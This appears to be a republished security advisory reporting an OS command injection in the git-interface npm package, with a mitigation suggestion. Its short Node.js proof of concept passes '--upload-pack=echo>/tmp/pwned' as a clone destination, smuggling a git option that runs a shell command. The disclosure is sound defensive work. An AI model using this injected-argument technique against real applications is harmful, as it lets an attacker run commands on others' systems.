Command Injection vulnerability in [email protected]

2022-04-1610:32:40

lirantal

www.huntr.dev

0.002 Low

EPSS

Percentile

60.3%

JSON

Command Injection vulnerability in [email protected]

git-interface describes itself as a Interface to work with a git repository in node.js

Resources:

Project’s GitHub source code: https://github.com/yarkeev/git-interface
Project’s npm package: https://www.npmjs.com/package/git-interface

I’m reporting an OS Command Injection vulnerability in git-interface npm package. The API may be abused if user input is able to provide a valid directory on disk and supply the destination directory to clone a repository too.

Proof of Concept exploit

Install [email protected] which is the latest.

Run the following code, with the following precondition, in which the /tmp/new directory needs to exist (doesn’t need to be a .git initialized directory though), and so, you could provide a predictable path like say /usr/src:

const { Git } = require('git-interface');

const git = new Git({
	dir: '/tmp/new' //default path is current directory
});

git.clone('file:///tmp/new', '--upload-pack=echo&gt;/tmp/pwned');

Observe a new file created: /tmp/pwned

Mitigation suggestions

Use the shell -- notation as a suffix of the supported command-line arguments (if at all), to then make sure that input passed to the git command is positional arguments rather than command-line arguments. For example: git clone -- <path> <destination> would prevent path and destination from being interpreted as command-line arguments for the git command.